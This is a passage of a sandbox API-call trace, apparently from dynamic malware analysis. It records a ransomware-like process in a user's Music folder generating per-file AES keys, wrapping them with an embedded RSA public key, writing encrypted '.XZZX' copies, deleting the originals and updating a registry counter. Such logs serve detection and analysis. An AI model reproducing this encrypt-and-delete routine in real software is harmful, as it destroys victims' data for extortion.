dwFileAttributes=0x20) returned 1 [0052.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\TWlZw1pNzI1gwZW3OH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\twlzw1pnzi1gwzw3oh.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x604 [0052.788] ReadFile (in: hFile=0x604, lpBuffer=0x439bb40, nNumberOfBytesToRead=0x49a, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x439bb40*, lpNumberOfBytesRead=0x417e418*=0x49a, lpOverlapped=0x0) returned 1 [0052.788] CloseHandle (hObject=0x604) returned 1 [0052.788] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0052.789] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0052.789] SetErrorMode (uMode=0x1) returned 0x1 [0052.789] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0052.789] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x439a4e8) returned 1 [0052.791] CryptGenKey (in: hProv=0x439a4e8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e288b8) returned 1 [0052.983] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0052.983] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0052.983] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0052.983] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0052.983] CryptDestroyKey (hKey=0x3e288b8) returned 1 [0052.984] CryptReleaseContext (hProv=0x439a4e8, dwFlags=0x0) returned 1 [0052.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\E003588E3DA0B59DC1493EC641B899E5.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\e003588e3da0b59dc1493ec641b899e5.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x600 [0052.984] WriteFile (in: hFile=0x600, lpBuffer=0x439bb40*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x439bb40*, lpNumberOfBytesWritten=0x417e438*=0x49a, lpOverlapped=0x0) returned 1 [0052.985] SetFilePointer (in: hFile=0x600, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x49a [0052.985] WriteFile (in: hFile=0x600, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.985] SetFilePointer (in: hFile=0x600, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x49f [0052.985] WriteFile (in: hFile=0x600, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x2c, lpOverlapped=0x0) returned 1 [0052.985] SetFilePointer (in: hFile=0x600, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4cb [0052.985] WriteFile (in: hFile=0x600, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.985] SetFilePointer (in: hFile=0x600, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4d0 [0052.985] SetErrorMode (uMode=0x1) returned 0x1 [0052.985] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0052.985] OutputDebugStringW (lpOutputString="end") [0052.985] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0052.985] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0052.985] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x439a4e8) returned 1 [0052.986] CryptImportPublicKeyInfo (in: hCryptProv=0x439a4e8, dwCertEncodingType=0x1, pInfo=0x42e18b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e18e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e18e8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e28a78) returned 1 [0052.986] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0052.987] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0052.987] CryptEncrypt (in: hKey=0x3e28a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0052.987] CryptEncrypt (in: hKey=0x3e28a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x439a570*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x439a570*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0052.987] WriteFile (in: hFile=0x600, lpBuffer=0x439a570*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x439a570*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0052.987] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0052.987] WriteFile (in: hFile=0x600, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.987] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0052.987] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0052.987] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x618) returned 0x0 [0052.987] RegQueryValueExW (in: hKey=0x618, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x64, lpcbData=0x417dfdc*=0x4) returned 0x0 [0052.987] RegCloseKey (hKey=0x618) returned 0x0 [0052.987] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x618) returned 0x0 [0052.988] RegSetValueExW (in: hKey=0x618, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x65, cbData=0x4 | out: lpData=0x417dfec*=0x65) returned 0x0 [0052.988] RegCloseKey (hKey=0x618) returned 0x0 [0052.988] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.988] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.988] CloseHandle (hObject=0x600) returned 1 [0052.989] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0052.990] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0052.990] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\TWlZw1pNzI1gwZW3OH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\twlzw1pnzi1gwzw3oh.mp3")) returned 1 [0052.990] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\TWlZw1pNzI1gwZW3OH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\twlzw1pnzi1gwzw3oh.mp3")) returned 0 Thread: id = 196 os_tid = 0xb78 [0052.991] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.991] lstrcpyW (in: lpString1=0x42cf460, lpString2="UazSw8R1r.wav" | out: lpString1="UazSw8R1r.wav") returned="UazSw8R1r.wav" [0052.991] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.991] SetErrorMode (uMode=0x1) returned 0x1 [0052.991] lstrcpyW (in: lpString1=0x42cf860, lpString2="UazSw8R1r.wav" | out: lpString1="UazSw8R1r.wav") returned="UazSw8R1r.wav" [0052.991] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0xee2d0395, Data2=0xc80c, Data3=0x47f8, Data4=([0]=0xa7, [1]=0xc6, [2]=0x49, [3]=0xd5, [4]=0x1b, [5]=0x49, [6]=0x42, [7]=0x11))) returned 0x0 [0052.991] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\UazSw8R1r.wav") returned 72 [0052.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0052.991] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned 96 [0052.991] StrStrW (lpFirst="UazSw8R1r.wav", lpSrch="XZZX") returned 0x0 [0052.991] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\UazSw8R1r.wav", dwFileAttributes=0x20) returned 1 [0052.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\UazSw8R1r.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\uazsw8r1r.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0052.992] ReadFile (in: hFile=0x624, lpBuffer=0x4385008, nNumberOfBytesToRead=0x1488f, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x4385008*, lpNumberOfBytesRead=0x42ce418*=0x1488f, lpOverlapped=0x0) returned 1 [0052.992] CloseHandle (hObject=0x624) returned 1 [0052.992] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0052.993] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0052.993] SetErrorMode (uMode=0x1) returned 0x1 [0052.993] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0052.993] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x439a5f8) returned 1 [0052.995] CryptGenKey (in: hProv=0x439a5f8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e288b8) returned 1 [0053.334] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0053.334] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0053.334] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0053.335] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0053.335] CryptDestroyKey (hKey=0x3e288b8) returned 1 [0053.335] CryptReleaseContext (hProv=0x439a680, dwFlags=0x0) returned 0 [0053.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\54E892FC383D1FA0EE2D03953C6A03E8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\54e892fc383d1fa0ee2d03953c6a03e8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0053.336] WriteFile (in: hFile=0x630, lpBuffer=0x4385008*, nNumberOfBytesToWrite=0x1488f, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x4385008*, lpNumberOfBytesWritten=0x42ce438*=0x1488f, lpOverlapped=0x0) returned 1 [0053.338] SetFilePointer (in: hFile=0x630, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1488f [0053.338] WriteFile (in: hFile=0x630, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0053.338] SetFilePointer (in: hFile=0x630, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14894 [0053.338] WriteFile (in: hFile=0x630, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x1a, lpOverlapped=0x0) returned 1 [0053.338] SetFilePointer (in: hFile=0x630, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x148ae [0053.338] WriteFile (in: hFile=0x630, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0053.338] SetFilePointer (in: hFile=0x630, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x148b3 [0053.338] SetErrorMode (uMode=0x1) returned 0x1 [0053.339] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0053.339] OutputDebugStringW (lpOutputString="end") [0053.339] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0053.339] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0053.339] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x439a708) returned 1 [0053.340] CryptImportPublicKeyInfo (in: hCryptProv=0x439a708, dwCertEncodingType=0x1, pInfo=0x42e1a50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e1a80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e1a88*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x3e288b8) returned 1 [0053.340] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0053.340] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0053.340] CryptEncrypt (in: hKey=0x3e288b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0053.340] CryptEncrypt (in: hKey=0x3e288b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x439a790*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x439a790*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0053.341] WriteFile (in: hFile=0x630, lpBuffer=0x439a790*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x439a790*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0053.341] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0053.341] WriteFile (in: hFile=0x630, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0053.341] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0053.341] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0053.341] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x634) returned 0x0 [0053.341] RegQueryValueExW (in: hKey=0x634, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x65, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0053.341] RegCloseKey (hKey=0x634) returned 0x0 [0053.341] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x634) returned 0x0 [0053.342] RegSetValueExW (in: hKey=0x634, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x66, cbData=0x4 | out: lpData=0x42cdfec*=0x66) returned 0x0 [0053.342] RegCloseKey (hKey=0x634) returned 0x0 [0053.342] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0053.342] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0053.343] CloseHandle (hObject=0x630) returned 1 [0053.345] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0053.346] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0053.346] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\UazSw8R1r.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\uazsw8r1r.wav")) returned 1 [0053.347] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\UazSw8R1r.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\uazsw8r1r.wav")) returned 0 Thread: id = 197 os_tid = 0x978 [0053.208] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0053.208] lstrcpyW (in: lpString1=0x417f460, lpString2="X7t8w3.m4a" | out: lpString1="X7t8w3.m4a") returned="X7t8w3.m4a" [0053.208] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0053.208] SetErrorMode (uMode=0x1) returned 0x1 [0053.208] lstrcpyW (in: lpString1=0x417f860, lpString2="X7t8w3.m4a" | out: lpString1="X7t8w3.m4a") returned="X7t8w3.m4a" [0053.208] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xaf2c6206, Data2=0xb306, Data3=0x4a6a, Data4=([0]=0xbd, [1]=0x42, [2]=0xba, [3]=0xb0, [4]=0xf8, [5]=0x76, [6]=0xa5, [7]=0x3f))) returned 0x0 [0053.208] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 